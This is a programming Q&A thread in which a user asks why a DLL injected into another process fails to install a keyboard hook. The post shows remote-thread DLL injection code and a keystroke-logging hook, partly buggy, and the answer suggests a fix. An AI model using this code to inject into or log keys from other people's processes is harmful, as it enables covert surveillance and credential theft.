# How to call function inside injected dll

Tags: c++

I'm trying to get keyboard messages from another process using injected dll,but I don't know where have to call function in my own program.
here is my injected dll functions :

```
//this is my dll main function  
BOOL APIENTRY DllMain(HANDLE hModule,DWORD  ul_reason_for_call,LPVOID   lpReserved)
      {
        /* open file */
        FILE *file;
        fopen_s(&file, "d:\\dll\\temp.txt", "a+");

        switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            hInst = (HINSTANCE)hModule;
// should be function calling be here????
            installhook(); 
            break;
        case DLL_PROCESS_DETACH:
            fprintf(file, "DLL detach function called.\n");
            break;
        case DLL_THREAD_ATTACH:
            fprintf(file, "DLL thread attach function called.\n");
            break;
        case DLL_THREAD_DETACH:
            fprintf(file, "DLL thread detach function called.\n");
            break;
        }
        hInst = (HINSTANCE)hModule;
        /* close file */
        fclose(file);
        return TRUE;
    }
```

here is my install hook function to installing keyboardproc to process

```
   BOOL __declspec(dllexport)__stdcall installhook()
        {
            HWND targetWnd;
            HANDLE hProcess;
            unsigned long processID = 0;
            hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hInst, GetCurrentThreadId());
            return TRUE;
        }
```

and this is my keyboardproc function body

```
LRESULT __declspec(dllexport)__stdcall  CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    char ch;
    MessageBoxA(nullptr, "key touched\n", "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING);
    do
    {
        if (((DWORD)lParam & 0x40000000) && (HC_ACTION == nCode))
        {
            if ((wParam == VK_SPACE) || (wParam == VK_RETURN) || (wParam >= 0x2f) && (wParam <= 0x100))
            {
                FILE *file;
                fopen_s(&file, "d:\\dll\\temp.txt", "a+");
                fprintf(file, nCode + ".\n");
            }
        }
    } while (0);
    return CallNextHookEx(hkb, nCode, wParam, lParam);
}
```

and finally here is my main program where I injected dll to the destination process

```
int procID = 9448;
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
    if (process == NULL) {
        printf("Error: the specified process couldn't be found.\n");
    }

    /*
    * Get address of the LoadLibrary function.
    */
    LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
    if (addr == NULL) {
        printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n");
    }

    /*
    * Allocate new memory region inside the process's address space.
    */
    LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (arg == NULL) {
        printf("Error: the memory could not be allocated inside the chosen process.\n");
    }

    /*
    * Write the argument to LoadLibraryA to the process's newly allocated memory region.
    */
    int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL);
    if (n == 0) {
        printf("Error: there was no bytes written to the process's address space.\n");
    }

    cout << procID << "\nhandle:" << process << "\nAddress:" << addr << "\nVirtualArg:" << arg << "\nWM:"<<n<<"\n";


    /*
    * Inject our DLL into the process's address space.
    */
    HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL);
    if (threadID == NULL) {
        printf("Error: the remote thread could not be created.\n");
    }
    else {
        printf("Success: the remote thread was successfully created.\n");
    }

    /*
    * Close the handle to the process, becuase we've already injected the DLL.
    */
    CloseHandle(process);
```

what is the wrong in my code and where must be change to get desired result!

Answer (score 1):

Yes, it can be called from DLL_PROCESS_ATTACH. 
But according to [msdn](https://msdn.microsoft.com/en-us/library/windows/desktop/ms644990%28v=vs.85%29.aspx)

> hMod [in] Type: HINSTANCE A handle to the DLL containing the hook
>   procedure pointed to by the lpfn parameter. **The hMod parameter must be
>   set to NULL if the dwThreadId parameter specifies a thread created by
>   the current process and if the hook procedure is within the code
>   associated with the current process.**

So change the `hMod` to be `NULL`

`hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, NULL, GetCurrentThreadId());`

Comment: thanks krab,that's ok,but in need to call installhook from my program? how can call install hook!?

Comment: No you don't need to call isntallhook from your program injecting the dll. You need call it from your dll in DLL_PROCESS_ATTACH. If it doesn't work, it can be because the program you try to hack has some protection against this :)

Comment: @MousaKhodaei: you should check return value from SetWindowsHookEx

Comment: I think that my install function doesn't call at all,I get changed my installhook function like this : MessageBoxA(nullptr,(LPCSTR) GetCurrentThreadId(), "DLL_PROCESS_ATTACH", MB_OK | MB_ICONWARNING); but I can't get any message, because this code is in first line of the installhook function and if installhook get called,then must inform me,but there is no result!!